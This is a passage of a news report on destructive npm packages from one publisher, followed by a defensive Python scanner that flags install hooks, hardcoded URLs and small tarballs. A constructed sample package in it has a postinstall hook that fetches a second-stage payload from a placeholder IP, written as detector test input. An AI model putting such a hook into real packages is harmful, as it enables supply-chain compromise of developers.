Masquerading as harmless plugins and utilities, the malicious packages carried destructive payloads meant to corrupt data, wipe critical files, and crash systems. Since their upload, they’ve picked up over 6200 downloads, escaping detection and slipping into unsuspecting developer environments.
“The threat actor behind this campaign, using the npm alias xuxingfeng with a registration email 1634389031@qq[.]com, has published eight packages designed to cause widespread damage across the JavaScript ecosystem,” said Socket researcher Kush Pandya in a blog post. “Notably, the same account has also published several legitimate, non-malicious packages that function as advertised.”
Earlier this month, hackers were found abusing npm to target multi-language developers with typosquatted packages carrying credential-stealing and remote code execution (RCE) payloads. Boychenko advised applying standard hygiene when managing dependencies from npm. He recommended using dependency-scanning tools to flag install-time lifecycle hooks (such as postinstall), hardcoded URLs, and unusually small tarballs, in addition to strengthening the development pipeline with automated security checks.
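The three signals listed above are simple to check before a package is ever installed. The following is an added example, not code from the article, from Socket, or from any of the packages it describes: a small Python scanner that opens an npm tarball (the `.tgz` that `npm pack <name>` downloads) and flags install-time lifecycle hooks in `package.json`, hardcoded `http(s)://` URLs in source files, and a suspiciously small archive. The package contents, the `203.0.113.10` address (from the TEST-NET-3 documentation range), and the 4096-byte size threshold are all constructed for the example; the threshold in particular is illustrative and should be tuned to what your dependency set normally looks like.

```python
import io
import json
import re
import tarfile

# Lifecycle scripts npm runs automatically at install time. Assumption: this is
# the set worth flagging; "prepare" also runs when installing straight from git.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Crude but effective: any absolute http(s) URL embedded in source is worth a look.
URL_RE = re.compile(r'https?://[^\s\'"`)]+')

# Tarballs smaller than this are "unusually small". Illustrative value only.
SMALL_TARBALL_BYTES = 4096


def build_tarball(files):
    """Build a gzipped, npm-style tarball in memory from {path: text}.

    Only used to construct sample input for this example; a real scan would
    read the .tgz produced by `npm pack <name>`.
    """
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for path, text in files.items():
            data = text.encode("utf-8")
            info = tarfile.TarInfo(name=path)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def scan_tarball(blob, small_threshold=SMALL_TARBALL_BYTES):
    """Return a list of (kind, detail) findings for one gzipped tarball."""
    findings = []

    # Signal 1: unusually small archive (a "plugin" that is really just a hook).
    if len(blob) < small_threshold:
        findings.append(("small-tarball", f"{len(blob)} bytes"))

    with tarfile.open(fileobj=io.BytesIO(blob), mode="r:gz") as tar:
        for member in tar.getmembers():
            if not member.isfile():
                continue
            text = tar.extractfile(member).read().decode("utf-8", errors="replace")

            # Signal 2: lifecycle hooks declared in the manifest.
            if member.name.endswith("package.json"):
                try:
                    scripts = json.loads(text).get("scripts", {})
                except json.JSONDecodeError:
                    findings.append(("unparseable-manifest", member.name))
                    continue
                for hook in INSTALL_HOOKS:
                    if hook in scripts:
                        findings.append(("lifecycle-hook", f"{hook}: {scripts[hook]}"))
                # Manifest URLs (repository, homepage) are expected; skip them.
                continue

            # Signal 3: hardcoded URLs in code or other shipped files.
            for url in URL_RE.findall(text):
                findings.append(("hardcoded-url", f"{member.name}: {url}"))

    return findings


# Constructed sample: a tiny "plugin" whose postinstall hook fetches a second stage.
SUSPICIOUS_TARBALL = build_tarball({
    "package/package.json": json.dumps({
        "name": "example-plugin",
        "version": "1.0.0",
        "scripts": {"postinstall": "node setup.js"},
    }),
    "package/setup.js": (
        "const http = require('http');\n"
        "http.get('http://203.0.113.10/stage2', r => r.pipe(process.stdout));\n"
    ),
})

# Constructed sample: an equally tiny but ordinary utility with no hooks or URLs.
BENIGN_TARBALL = build_tarball({
    "package/package.json": json.dumps({
        "name": "example-util",
        "version": "1.0.0",
        "scripts": {"test": "node test.js"},
    }),
    "package/index.js": "module.exports = (a, b) => a + b;\n",
})


if __name__ == "__main__":
    for label, blob in (("suspicious", SUSPICIOUS_TARBALL), ("benign", BENIGN_TARBALL)):
        print(f"== {label} ==")
        for kind, detail in scan_tarball(blob):
            print(f"  [{kind}] {detail}")
```

Both constructed samples trip the size check, which is the point of the threshold: size alone is a weak signal and is only useful in combination with a hook or an outbound URL, which is why the scanner reports each signal separately rather than returning a single verdict. To run this against a real candidate, replace the constructed blobs with the bytes of the file `npm pack <name>` writes, and consider gating `npm install` in CI on an empty finding list or on an explicit allowlist of hooks you have reviewed.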